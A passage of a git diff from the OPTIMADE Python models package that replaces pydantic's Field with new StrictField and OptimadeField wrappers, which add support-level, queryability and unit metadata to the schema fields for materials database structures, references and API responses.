ResponseMetaQuery = Field( + query: ResponseMetaQuery = StrictField( ..., description="Information on the Query that was requested" ) - api_version: SemanticVersion = Field( + api_version: SemanticVersion = StrictField( ..., description="""Presently used full version of the OPTIMADE API. The version number string MUST NOT be prefixed by, e.g., "v". Examples: `1.0.0`, `1.0.0-rc.2`.""", ) - more_data_available: bool = Field( + more_data_available: bool = StrictField( ..., description="`false` if the response contains all data for the request (e.g., a request issued to a single entry endpoint, or a `filter` query at the last page of a paginated response) and `true` if the response is incomplete in the sense that multiple objects match the request, and not all of them have been included in the response (e.g., a query with multiple pages that is not at the last page).", ) # start of "SHOULD" fields for meta response - optimade_schema: Optional[Union[AnyHttpUrl, jsonapi.Link]] = Field( + optimade_schema: Optional[Union[AnyHttpUrl, jsonapi.Link]] = StrictField( None, alias="schema", description="""A [JSON API links object](http://jsonapi.org/format/1.0/#document-links) that points to a schema for the response. @@ -281,40 +281,40 @@ It is possible that future versions of this specification allows for alternative Hence, if the `meta` field of the JSON API links object is provided and contains a field `schema_type` that is not equal to the string `OpenAPI` the client MUST not handle failures to parse the schema or to validate the response against the schema as errors.""", ) - time_stamp: Optional[datetime] = Field( + time_stamp: Optional[datetime] = StrictField( None, description="A timestamp containing the date and time at which the query was executed.", ) - data_returned: Optional[int] = Field( + data_returned: Optional[int] = StrictField( None, description="An integer containing the total number of data resource objects returned for the current `filter` query, independent of pagination.", ge=0, ) - provider: Optional[Provider] = Field( + provider: Optional[Provider] = StrictField( None, description="information on the database provider of the implementation." ) # start of "MAY" fields for meta response - data_available: Optional[int] = Field( + data_available: Optional[int] = StrictField( None, description="An integer containing the total number of data resource objects available in the database for the endpoint.", ) - last_id: Optional[str] = Field( + last_id: Optional[str] = StrictField( None, description="a string containing the last ID returned" ) - response_message: Optional[str] = Field( + response_message: Optional[str] = StrictField( None, description="response string from the server" ) - implementation: Optional[Implementation] = Field( + implementation: Optional[Implementation] = StrictField( None, description="a dictionary describing the server implementation" ) - warnings: Optional[List[Warnings]] = Field( + warnings: Optional[List[Warnings]] = StrictField( None, description="""A list of warning resource objects representing non-critical errors or warnings. A warning resource object is defined similarly to a [JSON API error object](http://jsonapi.org/format/1.0/#error-objects), but MUST also include the field `type`, which MUST have the value `"warning"`. @@ -328,7 +328,7 @@ This is an exclusive field for error resource objects.""", class Success(jsonapi.Response): """errors are not allowed""" - meta: ResponseMeta = Field( + meta: ResponseMeta = StrictField( ..., description="A meta object containing non-standard information" ) @@ -351,7 +351,7 @@ class Success(jsonapi.Response): class BaseRelationshipMeta(jsonapi.Meta): """Specific meta field for base relationship resource""" - description: str = Field( + description: str = StrictField( ..., description="OPTIONAL human-readable description of the relationship" ) @@ -359,7 +359,7 @@ class BaseRelationshipMeta(jsonapi.Meta): class BaseRelationshipResource(jsonapi.BaseResource): """Minimum requirements to represent a relationship resource""" - meta: Optional[BaseRelationshipMeta] = Field( + meta: Optional[BaseRelationshipMeta] = StrictField( None, description="Relationship meta field. MUST contain 'description' if supplied.", ) @@ -370,4 +370,4 @@ class Relationship(jsonapi.Relationship): data: Optional[ Union[BaseRelationshipResource, List[BaseRelationshipResource]] - ] = Field(None, description="Resource linkage", uniqueItems=True) + ] = StrictField(None, description="Resource linkage", uniqueItems=True) diff --git a/optimade/models/references.py b/optimade/models/references.py index 90570ae0..83a8c7d9 100644 --- a/optimade/models/references.py +++ b/optimade/models/references.py @@ -1,6 +1,5 @@ # pylint: disable=line-too-long,no-self-argument from pydantic import ( # pylint: disable=no-name-in-module - Field, BaseModel, AnyUrl, validator, @@ -8,15 +7,35 @@ from pydantic import ( # pylint: disable=no-name-in-module from typing import List, Optional from optimade.models.entries import EntryResource, EntryResourceAttributes +from optimade.models.utils import OptimadeField, SupportLevel __all__ = ("Person", "ReferenceResourceAttributes", "ReferenceResource") class Person(BaseModel): - name: str = Field(..., decsription="""Full name of the person, REQUIRED.""") - firstname: Optional[str] = Field(None, description="""First name of the person.""") - lastname: Optional[str] = Field(None, description="""Last name of the person.""") + """A person, i.e., an author, editor or other.""" + + name: str = OptimadeField( + ..., + description="""Full name of the person, REQUIRED.""", + support=SupportLevel.MUST, + queryable=SupportLevel.OPTIONAL, + ) + + firstname: Optional[str] = OptimadeField( + None, + description="""First name of the person.""", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, + ) + + lastname: Optional[str] = OptimadeField( + None, + description="""Last name of the person.""", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, + ) class ReferenceResourceAttributes(EntryResourceAttributes): @@ -27,87 +46,186 @@ class ReferenceResourceAttributes(EntryResourceAttributes): """ - authors: Optional[List[Person]] = Field( + authors: Optional[List[Person]] = OptimadeField( None, description="List of person objects containing the authors of the reference.", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, ) - editors: Optional[List[Person]] = Field( + + editors: Optional[List[Person]] = OptimadeField( None, description="List of person objects containing the editors of the reference.", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, ) - doi: Optional[str] = Field( - None, description="The digital object identifier of the reference." + doi: Optional[str] = OptimadeField( + None, + description="The digital object identifier of the reference.", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, ) - url: Optional[AnyUrl] = Field(None, description="The URL of the reference.") + url: Optional[AnyUrl] = OptimadeField( + None, + description="The URL of the reference.", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, + ) - address: Optional[str] = Field( - None, description="Meaning of property matches the BiBTeX specification." + address: Optional[str] = OptimadeField( + None, + description="Meaning of property matches the BiBTeX specification.", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, ) - annote: Optional[str] = Field( - None, description="Meaning of property matches the BiBTeX specification." + + annote: Optional[str] = OptimadeField( + None, + description="Meaning of property matches the BiBTeX specification.", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, ) - booktitle: Optional[str] = Field( - None, description="Meaning of property matches the BiBTeX specification." + + booktitle: Optional[str] = OptimadeField( + None, + description="Meaning of property matches the BiBTeX specification.", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, ) - chapter: Optional[str] = Field( - None, description="Meaning of property matches the BiBTeX specification." + + chapter: Optional[str] = OptimadeField( + None, + description="Meaning of property matches the BiBTeX specification.", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, ) - crossref: Optional[str] = Field( - None, description="Meaning of property matches the BiBTeX specification." + + crossref: Optional[str] = OptimadeField( + None, + description="Meaning of property matches the BiBTeX specification.", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, ) - edition: Optional[str] = Field( - None, description="Meaning of property matches the BiBTeX specification." + + edition: Optional[str] = OptimadeField( + None, + description="Meaning of property matches the BiBTeX specification.", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, ) - howpublished: Optional[str] = Field( - None, description="Meaning of property matches the BiBTeX specification." + + howpublished: Optional[str] = OptimadeField( + None, + description="Meaning of property matches the BiBTeX specification.", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, ) - institution: Optional[str] = Field( - None, description="Meaning of property matches the BiBTeX specification." + + institution: Optional[str] = OptimadeField( + None, + description="Meaning of property matches the BiBTeX specification.", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, ) - journal: Optional[str] = Field( - None, description="Meaning of property matches the BiBTeX specification." + + journal: Optional[str] = OptimadeField( + None, + description="Meaning of property matches the BiBTeX specification.", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, ) - key: Optional[str] = Field( - None, description="Meaning of property matches the BiBTeX specification." + + key: Optional[str] = OptimadeField( + None, + description="Meaning of property matches the BiBTeX specification.", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, ) - month: Optional[str] = Field( - None, description="Meaning of property matches the BiBTeX specification." + + month: Optional[str] = OptimadeField( + None, + description="Meaning of property matches the BiBTeX specification.", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, ) - note: Optional[str] = Field( - None, description="Meaning of property matches the BiBTeX specification." + + note: Optional[str] = OptimadeField( + None, + description="Meaning of property matches the BiBTeX specification.", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, ) - number: Optional[str] = Field( - None, description="Meaning of property matches the BiBTeX specification." + + number: Optional[str] = OptimadeField( + None, + description="Meaning of property matches the BiBTeX specification.", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, ) - organization: Optional[str] = Field( - None, description="Meaning of property matches the BiBTeX specification." + + organization: Optional[str] = OptimadeField( + None, + description="Meaning of property matches the BiBTeX specification.", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, ) - pages: Optional[str] = Field( - None, description="Meaning of property matches the BiBTeX specification." + + pages: Optional[str] = OptimadeField( + None, + description="Meaning of property matches the BiBTeX specification.", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, ) - publisher: Optional[str] = Field( - None, description="Meaning of property matches the BiBTeX specification." + + publisher: Optional[str] = OptimadeField( + None, + description="Meaning of property matches the BiBTeX specification.", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, ) - school: Optional[str] = Field( - None, description="Meaning of property matches the BiBTeX specification." + + school: Optional[str] = OptimadeField( + None, + description="Meaning of property matches the BiBTeX specification.", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, ) - series: Optional[str] = Field( - None, description="Meaning of property matches the BiBTeX specification." + + series: Optional[str] = OptimadeField( + None, + description="Meaning of property matches the BiBTeX specification.", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, ) - title: Optional[str] = Field( - None, description="Meaning of property matches the BiBTeX specification." + + title: Optional[str] = OptimadeField( + None, + description="Meaning of property matches the BiBTeX specification.", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, ) - bib_type: Optional[str] = Field( + + bib_type: Optional[str] = OptimadeField( None, description="Type of the reference, corresponding to the **type** property in the BiBTeX specification.", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, ) - volume: Optional[str] = Field( - None, description="Meaning of property matches the BiBTeX specification." + + volume: Optional[str] = OptimadeField( + None, + description="Meaning of property matches the BiBTeX specification.", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, ) - year: Optional[str] = Field( - None, description="Meaning of property matches the BiBTeX specification." + + year: Optional[str] = OptimadeField( + None, + description="Meaning of property matches the BiBTeX specification.", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, ) @@ -130,7 +248,7 @@ class ReferenceResource(EntryResource): """ - type: str = Field( + type: str = OptimadeField( "references", const="references", description="""The name of the type of an entry. @@ -143,6 +261,8 @@ class ReferenceResource(EntryResource): - The entry of type <type> and ID <id> MUST be returned in response to a request for `/<type>/<id>` under the versioned base URL. - **Example**: `"structures"`""", pattern="^references$", + support=SupportLevel.MUST, + queryable=SupportLevel.MUST, ) attributes: ReferenceResourceAttributes diff --git a/optimade/models/responses.py b/optimade/models/responses.py index 61fe03a4..6662fa26 100644 --- a/optimade/models/responses.py +++ b/optimade/models/responses.py @@ -11,6 +11,7 @@ from optimade.models.links import LinksResource from optimade.models.optimade_json import Success, ResponseMeta, OptimadeError from optimade.models.references import ReferenceResource from optimade.models.structures import StructureResource +from optimade.models.utils import StrictField __all__ = ( @@ -31,10 +32,10 @@ __all__ = ( class ErrorResponse(Response): """errors MUST be present and data MUST be skipped""" - meta: ResponseMeta = Field( + meta: ResponseMeta = StrictField( ..., description="A meta object containing non-standard information" ) - errors: List[OptimadeError] = Field( + errors: List[OptimadeError] = StrictField( ..., description="A list of OPTIMADE-specific JSON API error objects, where the field detail MUST be present.", uniqueItems=True, @@ -48,17 +49,21 @@ class ErrorResponse(Response): class IndexInfoResponse(Success): - data: IndexInfoResource = Field(..., description="Index meta-database /info data") + data: IndexInfoResource = StrictField( + ..., description="Index meta-database /info data" + ) class EntryInfoResponse(Success): - data: EntryInfoResource = Field( + data: EntryInfoResource = StrictField( ..., description="OPTIMADE information for an entry endpoint" ) class InfoResponse(Success): - data: BaseInfoResource = Field(..., description="The implementations /info data") + data: BaseInfoResource = StrictField( + ..., description="The implementations /info data" + ) class EntryResponseOne(Success): @@ -78,7 +83,7 @@ class EntryResponseMany(Success): class LinksResponse(EntryResponseMany): - data: Union[List[LinksResource], List[Dict[str, Any]]] = Field( + data: Union[List[LinksResource], List[Dict[str, Any]]] = StrictField( ..., description="List of unique OPTIMADE links resource objects", uniqueItems=True, @@ -86,13 +91,13 @@ class LinksResponse(EntryResponseMany): class StructureResponseOne(EntryResponseOne): - data: Union[StructureResource, Dict[str, Any], None] = Field( + data: Union[StructureResource, Dict[str, Any], None] = StrictField( ..., description="A single structures entry resource" ) class StructureResponseMany(EntryResponseMany): - data: Union[List[StructureResource], List[Dict[str, Any]]] = Field( + data: Union[List[StructureResource], List[Dict[str, Any]]] = StrictField( ..., description="List of unique OPTIMADE structures entry resource objects", uniqueItems=True, @@ -100,13 +105,13 @@ class StructureResponseMany(EntryResponseMany): class ReferenceResponseOne(EntryResponseOne): - data: Union[ReferenceResource, Dict[str, Any], None] = Field( + data: Union[ReferenceResource, Dict[str, Any], None] = StrictField( ..., description="A single references entry resource" ) class ReferenceResponseMany(EntryResponseMany): - data: Union[List[ReferenceResource], List[Dict[str, Any]]] = Field( + data: Union[List[ReferenceResource], List[Dict[str, Any]]] = StrictField( ..., description="List of unique OPTIMADE references entry resource objects", uniqueItems=True, diff --git a/optimade/models/structures.py b/optimade/models/structures.py index 09acafef..93a03c27 100644 --- a/optimade/models/structures.py +++ b/optimade/models/structures.py @@ -3,11 +3,16 @@ from enum import IntEnum, Enum from sys import float_info from typing import List, Optional, Union -from pydantic import Field, BaseModel, validator, root_validator, conlist +from pydantic import BaseModel, validator, root_validator, conlist from optimade.models.entries import EntryResourceAttributes, EntryResource -from optimade.models.utils import CHEMICAL_SYMBOLS, EXTRA_SYMBOLS - +from optimade.models.utils import ( + CHEMICAL_SYMBOLS, + EXTRA_SYMBOLS, + OptimadeField, + StrictField, + SupportLevel, +) EXTENDED_CHEMICAL_SYMBOLS = CHEMICAL_SYMBOLS + EXTRA_SYMBOLS @@ -64,12 +69,14 @@ class Species(BaseModel): """ - name: str = Field( + name: str = OptimadeField( ..., - decsription="""Gives the name of the species; the **name** value MUST be unique in the `species` list.""", + description="""Gives the name of the species; the **name** value MUST be unique in the `species` list.""", + support=SupportLevel.MUST, + queryable=SupportLevel.OPTIONAL, ) - chemical_symbols: List[str] = Field( + chemical_symbols: List[str] = OptimadeField( ..., description="""MUST be a list of strings of all chemical elements composing this species. Each item of the list MUST be one of the following: @@ -78,9 +85,11 @@ class Species(BaseModel): - the special value `"vacancy"` to represent that this site has a non-zero probability of having a vacancy (the respective probability is indicated in the `concentration` list, see below). If any one entry in the `species` list has a `chemical_symbols` list that is longer than 1 element, the correct flag MUST be set in the list `structure_features`.""", + support=SupportLevel.MUST, + queryable=SupportLevel.OPTIONAL, ) - concentration: List[float] = Field( + concentration: List[float] = OptimadeField( ..., description="""MUST be a list of floats, with same length as `chemical_symbols`. The numbers represent the relative concentration of the corresponding chemical symbol in this species. The numbers SHOULD sum to one. Cases in which the numbers do not sum to one typically fall only in the following two categories: @@ -88,29 +97,39 @@ If any one entry in the `species` list has a `chemical_symbols` list that is lon - Experimental errors in the data present in the database. In this case, it is the responsibility of the client to decide how to process the data. Note that concentrations are uncorrelated between different site (even of the same species).""", + support=SupportLevel.MUST, + queryable=SupportLevel.OPTIONAL, ) - mass: Optional[float] = Field( + mass: Optional[float] = OptimadeField( None, description="""If present MUST be a float expressed in a.m.u.""", unit="a.m.u.", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, ) - original_name: Optional[str] = Field( + original_name: Optional[str] = OptimadeField( None, description="""Can be any valid Unicode string, and SHOULD contain (if specified) the name of the species that is used internally in the source database. Note: With regards to "source database", we refer to the immediate source being queried via the OPTIMADE API implementation.""", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, ) - attached: Optional[List[str]] = Field( + attached: Optional[List[str]] = OptimadeField( None, description="""If provided MUST be a list of length 1 or more of strings of chemical symbols for the elements attached to this site, or "X" for a non-chemical element.""", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, ) - nattached: Optional[List[int]] = Field( + nattached: Optional[List[int]] = OptimadeField( None, description="""If provided MUST be a list of length 1 or more of integers indicating the number of attached atoms of the kind specified in the value of the :field:`attached` key.""", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, ) @validator("chemical_symbols", each_item=True) @@ -172,21 +191,25 @@ class Assembly(BaseModel): """ - sites_in_groups: List[List[int]] = Field( + sites_in_groups: List[List[int]] = OptimadeField( ..., description="""Index of the sites (0-based) that belong to each group for each assembly. - **Examples**: - `[[1], [2]]`: two groups, one with the second site, one with the third. - `[[1,2], [3]]`: one group with the second and third site, one with the fourth.""", + support=SupportLevel.MUST, + queryable=SupportLevel.OPTIONAL, ) - group_probabilities: List[float] = Field( + group_probabilities: List[float] = OptimadeField( ..., description="""Statistical probability of each group. It MUST have the same length as `sites_in_groups`. It SHOULD sum to one. See below for examples of how to specify the probability of the occurrence of a vacancy. The possible reasons for the values not to sum to one are the same as already specified above for the `concentration` of each `species`.""", + support=SupportLevel.MUST, + queryable=SupportLevel.OPTIONAL, ) @validator("sites_in_groups") @@ -212,7 +235,7 @@ The possible reasons for the values not to sum to one are the same as already sp class StructureResourceAttributes(EntryResourceAttributes): """This class contains the Field for the attributes used to represent a structure, e.g. unit cell, atoms, positions.""" - elements: List[str] = Field( + elements: List[str] = OptimadeField( ..., description="""Names of the different elements present in the structure. @@ -232,9 +255,11 @@ class StructureResourceAttributes(EntryResourceAttributes): - **Query examples**: - A filter that matches all records of structures that contain Si, Al **and** O, and possibly other elements: `elements HAS ALL "Si", "Al", "O"`. - To match structures with exactly these three elements, use `elements HAS ALL "Si", "Al", "O" AND elements LENGTH 3`.""", + support=SupportLevel.SHOULD, + queryable=SupportLevel.MUST, ) - nelements: int = Field( + nelements: int = OptimadeField( ..., description="""Number of different elements in the structure as an integer. @@ -251,9 +276,11 @@ class StructureResourceAttributes(EntryResourceAttributes): - Note: queries on this property can equivalently be formulated using `elements LENGTH`. - A filter that matches structures that have exactly 4 elements: `nelements=4`. - A filter that matches structures that have between 2 and 7 elements: `nelements>=2 AND nelements<=7`.""", + support=SupportLevel.SHOULD, + queryable=SupportLevel.MUST, ) - elements_ratios: List[float] = Field( + elements_ratios: List[float] = OptimadeField( ..., description="""Relative proportions of different elements in the structure. @@ -273,9 +300,11 @@ class StructureResourceAttributes(EntryResourceAttributes): - Note: Useful filters can be formulated using the set operator syntax for correlated values. However, since the values are floating point values, the use of equality comparisons is generally inadvisable. - OPTIONAL: a filter that matches structures where approximately 1/3 of the atoms in the structure are the element Al is: `elements:elements_ratios HAS ALL "Al":>0.3333, "Al":<0.3334`.""", + support=SupportLevel.SHOULD, + queryable=SupportLevel.MUST, ) - chemical_formula_descriptive: str = Field( + chemical_formula_descriptive: str = OptimadeField( ..., description="""The chemical formula for a structure as a string in a form chosen by the API implementation. @@ -299,9 +328,11 @@ class StructureResourceAttributes(EntryResourceAttributes): - Note: the free-form nature of this property is likely to make queries on it across different databases inconsistent. - A filter that matches an exactly given formula: `chemical_formula_descriptive="(H2O)2 Na"`. - A filter that does a partial match: `chemical_formula_descriptive CONTAINS "H2O"`.""", + support=SupportLevel.SHOULD, + queryable=SupportLevel.MUST, ) - chemical_formula_reduced: str = Field( + chemical_formula_reduced: str = OptimadeField( ..., description="""The reduced chemical formula for a structure as a string with element symbols and integer chemical proportion numbers. The proportion number MUST be omitted if it is 1. @@ -326,9 +357,11 @@ The proportion number MUST be omitted if it is 1. - **Query examples**: - A filter that matches an exactly given formula is `chemical_formula_reduced="H2NaO"`.""", + support=SupportLevel.SHOULD, + queryable=SupportLevel.MUST, ) - chemical_formula_hill: Optional[str] = Field( + chemical_formula_hill: Optional[str] = OptimadeField( None, description="""The chemical formula for a structure in [Hill form](https://dx.doi.org/10.1021/ja02046a005) with element symbols followed by integer chemical proportion numbers. The proportion number MUST be omitted if it is 1. @@ -354,9 +387,11 @@ The proportion number MUST be omitted if it is 1. - **Query examples**: - A filter that matches an exactly given formula is `chemical_formula_hill="H2O2"`.""", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, ) - chemical_formula_anonymous: str = Field( + chemical_formula_anonymous: str = OptimadeField( ..., description="""The anonymous formula is the `chemical_formula_reduced`, but where the elements are instead first ordered by their chemical proportion number, and then, in order left to right, replaced by anonymous symbols A, B, C, ..., Z, Aa, Ba, ..., Za, Ab, Bb, ... and so on. @@ -373,9 +408,11 @@ The proportion number MUST be omitted if it is 1. - **Querying**: - A filter that matches an exactly given formula is `chemical_formula_anonymous="A2B"`.""", + support=SupportLevel.SHOULD, + queryable=SupportLevel.MUST, ) - dimension_types: conlist(Periodicity, min_items=3, max_items=3) = Field( + dimension_types: conlist(Periodicity, min_items=3, max_items=3) = OptimadeField( ..., description="""List of three integers. For each of the three directions indicated by the three lattice vectors (see property `lattice_vectors`), this list indicates if the direction is periodic (value `1`) or non-periodic (value `0`). @@ -394,9 +431,11 @@ Note: the elements in this list each refer to the direction of the corresponding - For a wire along the direction specified by the third lattice vector: `[0, 0, 1]` - For a 2D surface/slab, periodic on the plane defined by the first and third lattice vectors: `[1, 0, 1]` - For a bulk 3D system: `[1, 1, 1]`""", + support=SupportLevel.SHOULD, + queryable=SupportLevel.OPTIONAL, ) - nperiodic_dimensions: int = Field( + nperiodic_dimensions: int = OptimadeField( ..., description="""An integer specifying the number of periodic dimensions in the structure, equivalent to the number of non-zero entries in `dimension_types`. @@ -414,9 +453,13 @@ Note: the elements in this list each refer to the direction of the corresponding - **Query examples**: - Match only structures with exactly 3 periodic dimensions: `nperiodic_dimensions=3` - Match all structures with 2 or fewer periodic dimensions: `nperiodic_dimensions<=2`""", + support=SupportLevel.SHOULD, + queryable=SupportLevel.MUST, ) - lattice_vectors: conlist(Vector3D_unknown, min_items=3, max_items=3) = Field( + lattice_vectors: conlist( + Vector3D_unknown, min_items=3, max_items=3 + ) = OptimadeField( ..., description="""The three lattice vectors in Cartesian coordinates, in ångström (Å). @@ -438,9 +481,11 @@ Note: the elements in this list each refer to the direction of the corresponding - **Examples**: - `[[4.0,0.0,0.0],[0.0,4.0,0.0],[0.0,1.0,4.0]]` represents a cell, where the first vector is `(4, 0, 0)`, i.e., a vector aligned along the `x` axis of length 4 Å; the second vector is `(0, 4, 0)`; and the third vector is `(0, 1, 4)`.""", unit="Å", + support=SupportLevel.SHOULD, + queryable=SupportLevel.OPTIONAL, ) - cartesian_site_positions: List[Vector3D] = Field( + cartesian_site_positions: List[Vector3D] = OptimadeField( ..., description="""Cartesian positions of each site in the structure. A site is usually used to describe positions of atoms; what atoms can be encountered at a given site is conveyed by the `species_at_sites` property, and the species themselves are described in the `species` property. @@ -457,9 +502,11 @@ A site is usually used to describe positions of atoms; what atoms can be encount - **Examples**: - `[[0,0,0],[0,0,2]]` indicates a structure with two sites, one sitting at the origin and one along the (positive) *z*-axis, 2 Å away from the origin.""", unit="Å", + support=SupportLevel.SHOULD, + queryable=SupportLevel.OPTIONAL, ) - nsites: int = Field( + nsites: int = OptimadeField( ..., description="""An integer specifying the length of the `cartesian_site_positions` property. @@ -475,9 +522,11 @@ A site is usually used to describe positions of atoms; what atoms can be encount - **Query examples**: - Match only structures with exactly 4 sites: `nsites=4` - Match structures that have between 2 and 7 sites: `nsites>=2 AND nsites<=7`""", + queryable=SupportLevel.MUST, + support=SupportLevel.SHOULD, ) - species: List[Species] = Field( + species: List[Species] = OptimadeField( ..., description="""A list describing the species of the sites of this structure. Species can represent pure chemical elements, virtual-crystal atoms representing a statistical occupation of a given site by multiple chemical elements, and/or a location to which there are attached atoms, i.e., atoms whose precise location are unknown beyond that they are attached to that position (frequently used to indicate hydrogen atoms attached to another element, e.g., a carbon with three attached hydrogens might represent a methyl group, -CH3). @@ -539,9 +588,11 @@ Species can represent pure chemical elements, virtual-crystal atoms representing - `[ {"name": "C12", "chemical_symbols": ["C"], "concentration": [1.0], "mass": 12.0} ]`: any site with this species is occupied by a carbon isotope with mass 12. - `[ {"name": "C13", "chemical_symbols": ["C"], "concentration": [1.0], "mass": 13.0} ]`: any site with this species is occupied by a carbon isotope with mass 13. - `[ {"name": "CH3", "chemical_symbols": ["C"], "concentration": [1.0], "attached": ["H"], "nattached": [3]} ]`: any site with this species is occupied by a methyl group, -CH3, which is represented without specifying precise positions of the hydrogen atoms.""", + support=SupportLevel.SHOULD, + queryable=SupportLevel.OPTIONAL, ) - species_at_sites: List[str] = Field( + species_at_sites: List[str] = OptimadeField( ..., description="""Name of the species at each site (where values for sites are specified with the same order of the property `cartesian_site_positions`). The properties of the species are found in the property `species`. @@ -561,9 +612,11 @@ The properties of the species are found in the property `species`. - **Examples**: - `["Ti","O2"]` indicates that the first site is hosting a species labeled `"Ti"` and the second a species labeled `"O2"`. - `["Ac", "Ac", "Ag", "Ir"]` indicating the first two sites contains the `"Ac"` species, while the third and fourth sites contain the `"Ag"` and `"Ir"` species, respectively.""", + support=SupportLevel.SHOULD, + queryable=SupportLevel.OPTIONAL, ) - assemblies: Optional[List[Assembly]] = Field( + assemblies: Optional[List[Assembly]] = OptimadeField( None, description="""A description of groups of sites that are statistically correlated. @@ -667,9 +720,11 @@ The properties of the species are found in the property `species`. Site 0 is present with a probability of 20 % and site 1 with a probability of 80 %. These two sites are correlated (either site 0 or 1 is present). Similarly, site 2 is present with a probability of 30 % and site 3 with a probability of 70 %. These two sites are correlated (either site 2 or 3 is present). However, the presence or absence of sites 0 and 1 is not correlated with the presence or absence of sites 2 and 3 (in the specific example, the pair of sites (0, 2) can occur with 0.2*0.3 = 6 % probability; the pair (0, 3) with 0.2*0.7 = 14 % probability; the pair (1, 2) with 0.8*0.3 = 24 % probability; and the pair (1, 3) with 0.8*0.7 = 56 % probability).""", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, ) - structure_features: List[StructureFeatures] = Field( + structure_features: List[StructureFeatures] = OptimadeField( ..., description="""A list of strings that flag which special features are used by the structure. @@ -692,6 +747,8 @@ The properties of the species are found in the property `species`. - `assemblies`: this flag MUST be present if the property `assemblies` is present. - **Examples**: A structure having implicit atoms and using assemblies: `["assemblies", "implicit_atoms"]`""", + support=SupportLevel.MUST, + queryable=SupportLevel.MUST, ) @validator("elements", each_item=True) @@ -868,7 +925,7 @@ The properties of the species are found in the property `species`. class StructureResource(EntryResource): """Representing a structure.""" - type: str = Field( + type: str = StrictField( "structures", const="structures", description="""The name of the type of an entry. @@ -885,6 +942,8 @@ class StructureResource(EntryResource): - **Examples**: - `"structures"`""", pattern="^structures$", + support=SupportLevel.MUST, + queryable=SupportLevel.MUST, ) attributes: StructureResourceAttributes diff --git a/optimade/models/utils.py b/optimade/models/utils.py index 8a32a7f8..7876dfd3 100644 --- a/optimade/models/utils.py +++ b/optimade/models/utils.py @@ -1,8 +1,116 @@ +import inspect +import warnings import re +from enum import Enum +from typing import Optional + +from pydantic import Field + +_PYDANTIC_FIELD_KWARGS = list(inspect.signature(Field).parameters.keys()) __all__ = ("CHEMICAL_SYMBOLS", "EXTRA_SYMBOLS", "ATOMIC_NUMBERS", "SemanticVersion") +class SupportLevel(Enum): + MUST = "must" + SHOULD = "should" + OPTIONAL = "optional" + + +def StrictField( + *args, + description: str = None, + **kwargs, +) -> Field: + """A wrapper around `pydantic.Field` that does the following: + + - Forbids any "extra" keys that would be passed to `pydantic.Field`, + except those used elsewhere to modify the schema in-place, + e.g. "uniqueItems", "pattern" and those added by OptimadeField, e.g. + "unit", "queryable" and "sortable". + - Emits a warning when no description is provided. + + Arguments: + *args: Positional arguments passed through to `Field`. + description: The description of the `Field`; if this is not + specified then a `UserWarning` will be emitted. + **kwargs: Extra keyword arguments to be passed to `Field`. + + Raises: + RuntimeError: If `**kwargs` contains a key not found in the + function signature of `Field`, or in the extensions used + by models in this package (see above). + + Returns: + The pydantic `Field`. + + """ + + allowed_keys = [ + "unit", + "pattern", + "uniqueItems", + "support", + "queryable", + "sortable", + ] + _banned = [k for k in kwargs if k not in set(_PYDANTIC_FIELD_KWARGS + allowed_keys)] + + if _banned: + raise RuntimeError( + f"Not creating StrictField({args}, {kwargs}) with forbidden keywords {_banned}." + ) + + if description is not None: + kwargs["description"] = description + + if description is None: + warnings.warn( + f"No description provided for StrictField specified by {args}, {kwargs}." + ) + + return Field(*args, **kwargs) + + +def OptimadeField( + *args, + support: Optional[SupportLevel] = None, + queryable: Optional[SupportLevel] = None, + unit: Optional[str] = None, + **kwargs, +) -> Field: + """A wrapper around `pydantic.Field` that adds OPTIMADE-specific + field paramters `queryable`, `support` and `unit`, indicating + the corresponding support level in the specification and the + physical unit of the field. + + Arguments: + support: The support level of the field itself, i.e. whether the field + can be null or omitted by an implementation. + queryable: The support level corresponding to the queryablility + of this field. + unit: A string describing the unit of the field. + + Returns: + The pydantic field with extra validation provided by [`StrictField`][optimade.models.utils.StrictField]. + + """ + + # Collect non-null keyword arguments to add to the Field schema + if unit is not None: + kwargs["unit"] = unit + if queryable is not None: + if isinstance(queryable, str): + queryable = SupportLevel(queryable.lower()) + kwargs["queryable"] = queryable + if support is not None: + if isinstance(support, str): + support = SupportLevel(support.lower()) + kwargs["support"] = support + + return StrictField(*args, **kwargs) + + class SemanticVersion(str): """A custom type 